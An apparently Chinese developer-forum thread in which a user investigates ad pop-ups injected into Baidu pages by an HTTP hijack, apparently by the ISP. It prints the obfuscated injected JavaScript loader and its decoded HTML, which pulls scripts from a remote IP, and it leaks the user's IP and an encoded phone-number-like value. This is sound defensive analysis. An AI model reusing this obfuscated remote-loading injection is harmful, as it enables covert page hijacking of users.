87,907
社区成员
发帖
与我相关
我的任务
分享大家帮我看下这个HTTP劫持脚本是如何起作用的?
家里的网络确定是被劫持了。劫持后会弹出的广告如图中的右下角所示(每次都是这个内容):
其实不止这个网页,尤其是当我每天一开机刚一连上网,在加载百度网站还没加载出来的时候这个广告就会弹出来,过几秒就自行消失了。我趁着主体网页还没弹出来且广告没消失的时候Ctrl+U取到了他的源代码,贴如下(稍微整理了下格式,每个分号我都加了个回车):
这个脚本我怎么看也看不懂,有没有人能给个解释他是怎么变出一个FLASH弹窗的啊?
其实不止这个网页,尤其是当我每天一开机刚一连上网,在加载百度网站还没加载出来的时候这个广告就会弹出来,过几秒就自行消失了。我趁着主体网页还没弹出来且广告没消失的时候Ctrl+U取到了他的源代码,贴如下(稍微整理了下格式,每个分号我都加了个回车):
<script>
var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;
00223/5/34/215;
95903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;
00223/5/34/215;
9590vujm/kt#?=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=0cpez?=tdsjqu!tsd>#iuuq;
00223/5/34/215;
9590b`ud/kt@beje>318111'uddb>NUN5NUN{O{Z{PUR>'vsjq>211/78/89/75";
function i(_,__)
{
_+=__;
var $="";
for(var u=0;u<_.length;u++)
{
var r=_.charCodeAt(u);
$+=String.fromCharCode(r-1);
}
return $;
}
var c="'tuqu>1'fequ>1'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31w'bpsmv>bIS1dEpwM{FyNj51MkJ{MkFxOEp5OEhwNkB4NEBxMx>>'tqje>413428981'bsfb>1'q2bsn>341'q3bsn>491'q4bsn>21'q5bsn>4'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1'npuo>485:7446:1'tbbt>648116423'q8bsn>2'q9bsn>1'qtbe>4343379435'buje>2'qbbu>1'bbje>1'jtbb>1'fowt>1'dlut>2537368821#?=0tdsjqu?=0iunm?";
document.write(i(d,c));
</script>
这个脚本我怎么看也看不懂,有没有人能给个解释他是怎么变出一个FLASH弹窗的啊?
...全文
请发表友善的回复…
发表回复
CloudAbyss 2016-08-31
- 打赏
- 举报
嗯,针对拿百度做主页的,是解决了,直接 HTTPS访问,就没问题了。
冰巫 2015-06-28
- 打赏
- 举报
楼主解决了吗?我们电信也有。。。。。
他把原网页放进了div id ="i"
把广告页插进了 div id ="x"
他把原网页放进了div id ="i"
把广告页插进了 div id ="x"
CloudAbyss 2015-03-15
- 打赏
- 举报
多谢版主指点。当时我只是急于解决问题,所以先用我熟悉的工具先做了。
vickemble 2015-03-14
- 打赏
- 举报
你要干什么坏事?
CloudAbyss 2015-03-14
- 打赏
- 举报
刚刚写了个C#程序模拟了一下,C#程序代码如下:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace ConsoleApplication1
{
class Program
{
static void Main(string[] args)
{
string a="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00223/5/34/215;95903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00223/5/34/215;9590vujm/kt#?=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=0cpez?=tdsjqu!tsd>#iuuq;00223/5/34/215;9590b`ud/kt@beje>318111'uddb>NUN5NUN{O{Z{PUR>'vsjq>211/78/89/75";
string b = "'tuqu>1'fequ>1'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31w'bpsmv>bIS1dEpwM{FyNj51MkJ{MkFxOEp5OEhwNkB4NEBxMx>>'tqje>413428981'bsfb>1'q2bsn>341'q3bsn>491'q4bsn>21'q5bsn>4'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1'npuo>485:7446:1'tbbt>648116423'q8bsn>2'q9bsn>1'qtbe>4343379435'buje>2'qbbu>1'bbje>1'jtbb>1'fowt>1'dlut>2537368821#?=0tdsjqu?=0iunm?";
string c = a + b;
string d = null;
char[] array = c.ToCharArray();
for (int i = 0; i < c.Length; i++)
{
int tempcode = char.ConvertToUtf32(c, i) - 1;
d = d + char.ConvertFromUtf32(tempcode);
}
Console.WriteLine(d);
}
}
}
<html>
<head>
<link rel="stylesheet" type="text/css" href="http://112.4.23.104:848/2.css">
<script type="text/javascript" src="http://112.4.23.104:848/util.js">
</script>
</head>
<body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no>
</body>
<script src="http://112.4.23.104:848/a_tc.js?adid=207000&tcca=MTM4MTMzNzYzOTQ=
&urip=100.67.78.64&stpt=0&edpt=0&orlu=aHR0cDovL3d3dy5iYWlkdS5jb20v&aorlu=aHR0cDo
vLzExMi40LjIzLjEwNDo4NDgvMjA3MDAwLw==&spid=302317870&area=0&p1arm=230&p2arm=380&
p3arm=10&p4arm=3&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0&motn=374963359
0&saas=537005312&p7arm=1&p8arm=0&psad=3232268324&atid=1&paat=0&aaid=0&isaa=0&env
s=0&ckts=1426257710">
</script>
</html>
CloudAbyss 2015-03-14
- 打赏
- 举报
昨天晚上临关机前又看了一段代码一眼,这才反应过来,它其实是通过字符串转换将一段乱码转换成了另一段字符串,可能转出来后的才是真正的脚本代码,今天有空写个程序看看转出来的到底是什么玩意。
forrg 2015-03-14
- 打赏
- 举报
应该是从某个邮箱里取得图片并显示了,找找这个脚本怎么获得的,监视流量看看,拷到本地运行它,看charcode后生成了啥
Go 旅城通票 2015-03-14
- 打赏
- 举报
还用C#来解码。。多学下js,将
document.write(i(d,c));
改为
alert(i(d,c));就看到源代码了
这个一般是你isp提供商插入的广告代码的多。。
CloudAbyss 2015-03-14
- 打赏
- 举报
本来只是想让大家看着帮忙参详一下到底是怎么回事的,因为我做系统的时候非常小心,应该不太可能中病毒,平时都是在VHD差分磁盘环境中工作。刚刚在百度上查了下“112.4.23.104”这个IP地址,确定为就是南京移动的,我用的就是移动的宽带,这样可不可以这个HTTP劫持就是移动所为的呢?
